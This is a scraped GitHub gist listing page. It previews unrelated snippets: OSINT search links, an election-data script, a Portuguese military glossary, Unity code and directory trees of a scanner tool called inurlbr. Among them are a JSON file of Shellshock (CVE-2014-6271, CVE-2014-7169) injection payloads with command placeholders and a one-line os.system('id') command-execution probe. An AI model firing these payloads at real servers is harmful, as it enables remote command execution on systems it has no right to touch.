This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "label": "GEOSINTsearch", | |
| "description": "Searches within posts from Twitter, Reddit and 4Chan and presents anything that contains a Google Maps link", | |
| "value": "https://cse.google.com/cse?cx=015328649639895072395:sbv3zyxzmji" | |
| }, | |
| { | |
| "label": "Pasted tekst", | |
| "description": "Look if any specifc text has been posted before", | |
| "value": "https://cse.google.com/cse/publicurl?cx=013991603413798772546:nxs552dhq8k" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # O cΓ³digo Γ© do @BrennoSullivan, sΓ³ tΓ΄ colocando aqui pra ficar mais fΓ‘cil pro pessoal copiar. | |
| # https://gist.github.com/oliverbot/5fa9ab1c86b0c4600b9d929e618f69f4 | |
| # https://twitter.com/BrennoSullivan/status/1576655828089974785/photo/1 | |
| # SΓ³ modifiquei para mostrar os outros cadidados, partidos e vice. | |
| import requests | |
| import json | |
| import pandas as pd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| os.system("id") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bitcoin Address | |
| - 1PBgsz3bar9N64omj7APSY7rATQ2fyH6Vm | |
| Bitcoin Abuse Database | |
| - https://www.bitcoinabuse.com/reports/1PBgsz3bar9N64omj7APSY7rATQ2fyH6Vm | |
| Block Chain | |
| - https://www.blockchain.com/btc/address/1PBgsz3bar9N64omj7APSY7rATQ2fyH6Vm |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ABALROAMENTO β Choque entre duas ou mais - ou de uma com duas ou mais - aeronaves, em voo ou em manobra na superfΓcie, ou choque mecΓ’nico entre duas ou mais β ou de uma com duas ou mais β embarcaΓ§Γ΅es de qualquer espΓ©cie, ou seus pertences e acessΓ³rios, em porto, local de atracaΓ§Γ£o, ou via navegΓ‘vel,ou choque mecΓ’nico entre dois ou mais β ou de um com dois ou mais β veΓculos terrestres (viaturas e/ou equipamentos) e/ou seus apΓͺndices e acessΓ³rios,e do qual resultem danos. Ver COLISΓO. | |
| ABANDONO DE POSTO β Abandonar, sem ordem superior, o posto ou lugar de serviΓ§o que lhe tenha sido designado, ou o serviΓ§o que lhe cumpria, antes de terminΓ‘-lo. | |
| ABARRANCAGEM β Manobra realizada por navios ou embarcaΓ§Γ΅es, com ou sem encalhe intencional, nas margens de um rio ou lagoa, com a amarraΓ§Γ£o do navio a troncos ou a estruturas rΓgidas de fortuna. | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using UnityEngine; | |
| using System.Collections; | |
| public class PlayerController : MonoBehaviour { | |
| private float _speed; | |
| public float walkSpeed = 2f; | |
| public float runSpeed = 4f; | |
| private Rigidbody _playerRigidbody; | |
| private Vector3 _movimentVector3; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| βββ form_qt_designer | |
| β βββ MainForm.ui | |
| βββ main.py | |
| βββ README.md | |
| βββ screenshot | |
| β βββ banner.png | |
| β βββ Combinear.png | |
| β βββ Darkeum.png | |
| β βββ Fibers.png |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| βββ inurlbr.php | |
| βββ LICENSE | |
| βββ modules | |
| βββ output | |
| βββ README.md | |
| βββ resources | |
| β βββ exploits.inurl | |
| β βββ strings.validation.inurl | |
| β βββ token.ipinfo.inurl |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "config": { | |
| "threads": 10, | |
| "path": { | |
| "path_output": "output/", | |
| "path_wordlist": "wordlist/", | |
| "path_modules": "modules/", | |
| "path_assets": "assets/" | |
| }, | |
| "files_assets":{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "DEFAULT": | |
| "() { :; }; echo ; /bin/bash -c '_COMMAND_'", | |
| "CVE-2014-6271": | |
| "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'", | |
| "CVE-2014-6271-2": | |
| "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'", | |
| "CVE-2014-6271-3": | |
| "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;", | |
| "CVE-2014-7169": |
NewerOlder